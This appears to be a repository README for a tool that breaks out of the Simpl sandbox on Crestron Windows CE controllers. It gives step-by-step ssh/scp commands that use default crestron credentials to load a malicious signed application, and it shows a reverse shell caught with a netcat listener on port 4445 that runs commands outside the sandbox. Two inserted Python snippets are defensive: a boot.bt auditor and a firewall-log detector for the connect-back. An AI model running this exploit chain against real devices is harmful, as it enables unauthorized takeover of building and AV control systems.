crestron

Tools for taking over Crestron Windows CE devices without the need for Crestron Toolbox.

If you have authenticated access, or the default crestron:<blank> credentials are still enabled, you can use the provided Simpl application to load a malicious application that breaks out of the sandbox to connect back to you.

In a perfect world, Crestron Simpl applications run in a sandbox and are signed with a special Crestron certificate that is shipped with Crestron Toolbox or the Simpl IDE. However, the application in this repository is a signed Crestron application that breaks out of the Simpl sandbox on supported Crestron Windows CE devices. Windows .NET Compact Framework v3.5 is the expected target.

The ports available to the interface can change depending on the device type, and whether you are looking at the control side or the LAN side. If the device has only the LAN interface connected, it will listen with all ports on that interface. Otherwise, the control ports will be listening on the control interface. The key ports are 21, 22, 23, 41794, or 41795.

$ nmap 192.168.1.174
Starting Nmap 7.92 ( https://nmap.org ) at 2022-07-01 13:46 CDT
Nmap scan report for DMPS3-7f81812f.attlocal.net (192.168.1.174)
Host is up (0.0036s latency).
Not shown: 993 closed tcp ports (conn-refused)
PORT     STATE SERVICE
21/tcp   open  ftp
22/tcp   open  ssh
23/tcp   open  telnet
80/tcp   open  http
443/tcp  open  https
843/tcp  open  unknown
6510/tcp open  mcer-port

The following steps assume you are starting from a clean slate. If you want to factory reset the device first so nothing unexpected interferes, SSH into the device and run RESTORE.

mkdir tmp
cd tmp
unzip ../pro3.lpz
ssh [email protected] del \\User\\*
scp * [email protected]:\\User
ssh [email protected] copy \\User\\boot.bt \\Simpl\\App01\\
ssh [email protected] copy \\User\\fdsa_archive.zip \\Simpl\\App01\\
ssh [email protected] copy \\User\\fdsa.bin \\Simpl\\App01\\
ssh [email protected] copy \\User\\fdsa.cdm \\Simpl\\App01\\
ssh [email protected] copy \\User\\fdsa.dll \\Simpl\\App01\\
ssh [email protected] copy \\User\\fdsa.rte \\Simpl\\App01\\
ssh [email protected] copy \\User\\SimplSharpCustomAttributesInterface.dll \\Simpl\\App01\\
ssh [email protected] copy \\User\\SimplSharpData.dat \\Simpl\\App01\\
ssh [email protected] copy \\User\\SimplSharpHelperInterface.dll \\Simpl\\App01\\
ssh [email protected] copy \\User\\SplusLibrary.dll \\Simpl\\App01\\
ssh [email protected] copy \\User\\SplusManagerApp.exe \\Simpl\\App01\\
ssh [email protected] copy \\User\\SplusObjects.dll \\Simpl\\App01\\
ssh [email protected] progregister -P:all
ssh [email protected] progreset

Other Devices

If you can telnet or SSH into the device, the console prompt shows the RackType to use when updating boot.bt.

$ telnet 192.168.1.174
Trying 192.168.1.174...
Connected to 192.168.1.174.
Escape character is '^]'.
DMPS3-4K-150-C Console
Warning: Another console session is open 

DMPS3-4K-150-C>

In boot.bt, the RackType is in the first stanza and is set to PRO3 by default.

[LG_BOOT_DATA]
BinFileName=fdsa.bin
SMWFileName=fdsa.smw
NumberSymbols=15
NumberSignals=33
RouteFileName=fdsa.rte
CUZ=1.007.0017
RackType=PRO3                 <---------- here
SymParamVersion=21.007.0017
NumberParameters=3
NumRealIntegralParams=0
NumRealStringParams=3
NVRAMUsed=0

[...snip...]

Replacing PRO3 with the device type will ensure the device does not reject the application.
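The stanza above is plain INI-style key=value text, so it can be audited mechanically. The following added example (not part of this repository) parses the [LG_BOOT_DATA] stanza of a boot.bt and compares its RackType with the device type shown in the console banner, and its program file names with an allowlist, so an operator can check what is loaded in an App slot. The sample boot.bt content, the banner and the allowlist are constructed for illustration.

```python
import re

# Constructed sample of a boot.bt first stanza, in the layout shown above
SAMPLE_BOOT_BT = """[LG_BOOT_DATA]
BinFileName=fdsa.bin
SMWFileName=fdsa.smw
NumberSymbols=15
NumberSignals=33
RouteFileName=fdsa.rte
CUZ=1.007.0017
RackType=PRO3
SymParamVersion=21.007.0017
NumberParameters=3

[OTHER_SECTION]
Key=value
"""


def parse_boot_bt(text):
    """Parse INI-style stanzas into {section: {key: value}}; blank and ';' lines are skipped."""
    sections, current = {}, None
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith(";"):
            continue
        m = re.fullmatch(r"\[(.+)\]", line)
        if m:
            current = sections.setdefault(m.group(1), {})
            continue
        if current is not None and "=" in line:
            key, _, value = line.partition("=")
            current[key.strip()] = value.strip()
    return sections


def audit_boot_bt(text, console_banner, expected_programs):
    """Return findings for a boot.bt: RackType vs. device type, and program name vs. allowlist."""
    boot = parse_boot_bt(text).get("LG_BOOT_DATA", {})
    findings = []
    # The console banner/prompt ("DMPS3-4K-150-C Console", "DMPS3-4K-150-C>") starts with the device type
    device_type = console_banner.split()[0].rstrip(">")
    rack = boot.get("RackType")
    if rack != device_type:
        findings.append(f"RackType {rack!r} does not match device type {device_type!r}")
    for key in ("BinFileName", "SMWFileName", "RouteFileName"):
        name = boot.get(key)
        if name not in expected_programs:
            findings.append(f"{key}={name!r} is not an approved program file")
    return findings
```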

Using the shell

The shell expects a \User\ip file with the IP address to connect back to. Port 4445 is hardcoded.

$ echo -n 192.168.1.123 > ip
$ scp ip [email protected]:/User

Once the connection is made, you can begin interacting outside of the sandbox.

$ nc -l 4445
Connected
 > ls
\Network
\Windows
\Temp
\Program Files
\My Documents
\HTML
\Sys
\Simpl
\Nvram
\FTP
\User
\ROMDISK
\Application Data
\My Recent Documents
\Recycled
\SSHBanner
 >  

Compare this with the directory listing visible from inside the sandboxed console:

$ telnet 192.168.1.174
Trying 192.168.1.174...
Connected to dmps3-7f81812f.attlocal.net.
Escape character is '^]'.
DMPS3-4K-150-C Console
Warning: Another console session is open 

DMPS3-4K-150-C>dir
Directory of \
      [DIR]  09-21-15 08:58:24 FTP
      [DIR]  09-21-15 08:58:24 HTML
      [DIR]  09-21-15 08:58:24 Nvram
      [DIR]  09-21-15 08:58:26 ROMDISK
      [DIR]  09-21-15 08:58:24 Simpl
      [DIR]  09-21-15 09:05:26 SSHBanner
      [DIR]  09-21-15 08:58:24 Sys
      [DIR]  09-21-15 08:58:26 User

DMPS3-4K-150-C>

Available commands are ls, pwd, exec, cat, cd, and base64.

On PRO3, for instance, you can run a graphics test executable to demonstrate the issue.

 > exec \Windows\cube.exe

A spinning cube will replace the Crestron menu on the display.
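Because the shell connects back from the controller to a hardcoded port, the session is visible as an outbound TCP connection from the device. The following added detection example (not part of this repository) runs over constructed firewall log lines and flags any controller-initiated connection to port 4445, or to a destination outside an approved set. The controller addresses, the allowlist and the log format are assumptions for illustration.

```python
import ipaddress
import re

# Constructed key=value firewall log lines; not taken from the original page
SAMPLE_LOGS = """\
2022-07-01T13:50:01Z action=allow proto=tcp src=192.168.1.174 sport=49152 dst=192.168.1.123 dport=4445
2022-07-01T13:50:05Z action=allow proto=tcp src=192.168.1.50 sport=51000 dst=192.168.1.174 dport=22
2022-07-01T13:51:10Z action=allow proto=tcp src=192.168.1.174 sport=49153 dst=10.0.0.5 dport=443
2022-07-01T13:52:00Z action=allow proto=tcp src=192.168.1.174 sport=49154 dst=203.0.113.9 dport=4445
"""

# Assumed inventory: known Crestron controllers and the destinations they may legitimately reach
CONTROLLERS = {ipaddress.ip_address("192.168.1.174")}
APPROVED_DST = {ipaddress.ip_address("10.0.0.5")}
CONNECT_BACK_PORT = 4445  # hardcoded in the shell described above

KV = re.compile(r"(\w+)=(\S+)")


def parse_line(line):
    """Split one log line into a dict of key=value fields plus its leading timestamp."""
    fields = dict(KV.findall(line))
    return {"ts": line.split()[0], **fields}


def find_connect_backs(log_text):
    """Return (timestamp, dst, dport, reason) for suspicious controller-initiated TCP sessions."""
    alerts = []
    for line in log_text.splitlines():
        ev = parse_line(line)
        if ev.get("proto") != "tcp":
            continue
        src, dst = ipaddress.ip_address(ev["src"]), ipaddress.ip_address(ev["dst"])
        if src not in CONTROLLERS:
            continue  # only sessions initiated by a controller are of interest here
        dport = int(ev["dport"])
        if dport == CONNECT_BACK_PORT:
            alerts.append((ev["ts"], str(dst), dport, "controller connecting out to shell port"))
        elif dst not in APPROVED_DST:
            alerts.append((ev["ts"], str(dst), dport, "controller connecting to unapproved destination"))
    return alerts
```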
